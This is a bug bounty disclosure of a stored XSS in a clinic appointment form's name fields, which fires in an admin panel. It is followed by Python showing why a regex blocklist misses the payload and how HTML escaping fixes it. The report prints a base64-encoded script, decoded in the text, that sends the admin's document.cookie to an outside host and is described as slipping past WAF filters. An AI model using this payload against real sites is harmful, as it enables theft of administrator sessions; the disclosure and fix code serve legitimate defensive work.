FirstBlood-#171 — Stored XSS payload allowed in names when making an appointment can leak admin cookie
On 2021-05-11, xnl-h4ck3r reported:
A stored XSS vulnerability exists that allows an attacker to insert a payload in First name (fname) and/or Surname (lname) on /book-appointment.html that will fire on the endpoint /drpanel/drapi/query.php if an admin views the endpoint directly for that appointment. The payload can leak the admin session cookie to the attacker.
Steps to Reproduce
- Book an appointment on /book-appointment.html and set the first name to <script/src="data:;base64,dmFyIHg9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7eC5vcGVuKCdHRVQnLCcvL3huMS51ay9jPScgKyBkb2N1bWVudC5jb29raWUpO3guc2VuZCgpOw=="></script/x> Set all other fields to anything. NOTE: This payload contains a Base64 encoding of var x=new XMLHttpRequest();x.open('GET','//xn1.uk/c=' + document.cookie);x.send(); which gets around various WAF filters. A burp collab URL can replace
- Log in as an admin user and go to
- Look at the appointment you just made and use dev tools to inspect the element and make note of the aptid passed to the getinfo function, e.g. 56912315:
- Go to
aptid parameter is set to the ID found in Step 3.
- Observe the payload fires and the value of cookie drps is leaked to the attacker's server, e.g.
The impact of this vulnerability is that an attacker could steal the admin's drps cookie, potentially allowing them to perform actions as that user that require admin authorisation.
FirstBlood ID: 10
Vulnerability Type: Stored XSS
When creating an appointment, it is possible to get stored XSS in /drapi/query.php via the patient's name.
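The report notes that the slash-separated script tag gets past WAF filters. As an added illustration (not code from FirstBlood or the reporter), the Python below shows why a blocklist of that kind fails and why HTML entity encoding of the name fields at render time fixes the bug class; the row-rendering functions are hypothetical, and the sample payload keeps only the shape from the report with a placeholder body.

```python
import html
import re

# Constructed sample: same tag shape as the reported payload, but the base64
# body is a placeholder rather than a working cookie-exfiltration script.
SAMPLE_FNAME = '<script/src="data:;base64,PLACEHOLDER"></script/x>'

# Naive blocklist of the kind a WAF or input filter might apply: it expects
# whitespace between "<script" and "src", which the "/" separator avoids.
NAIVE_BLOCK = re.compile(r'<script\s+src', re.IGNORECASE)


def naive_filter_blocks(value: str) -> bool:
    """True if the blocklist would reject this input (it misses SAMPLE_FNAME)."""
    return bool(NAIVE_BLOCK.search(value))


def render_appointment_row_unsafe(fname: str, lname: str, aptid: int) -> str:
    """Hypothetical rendering that concatenates names into HTML: the bug class."""
    return f'<tr><td>{aptid}</td><td>{fname} {lname}</td></tr>'


def render_appointment_row_safe(fname: str, lname: str, aptid: int) -> str:
    """Same row with entity encoding applied to every untrusted value.

    html.escape with quote=True encodes < > & " and ', so the name is shown as
    text and can no longer open a tag or break out of an attribute.
    """
    return (
        f'<tr><td>{html.escape(str(aptid), quote=True)}</td>'
        f'<td>{html.escape(fname, quote=True)} {html.escape(lname, quote=True)}</td></tr>'
    )


def contains_active_tag(rendered: str) -> bool:
    """Crude check: does the markup still contain a live <script ...> opener?"""
    return re.search(r'<script[\s/]', rendered, re.IGNORECASE) is not None


if __name__ == '__main__':
    print('blocklist catches sample:', naive_filter_blocks(SAMPLE_FNAME))
    print('unsafe row:', render_appointment_row_unsafe(SAMPLE_FNAME, 'Doe', 56912315))
    print('safe row:  ', render_appointment_row_safe(SAMPLE_FNAME, 'Doe', 56912315))
```

Marking the drps session cookie HttpOnly would additionally stop document.cookie from reading it, but that is a second layer and does not remove the XSS itself.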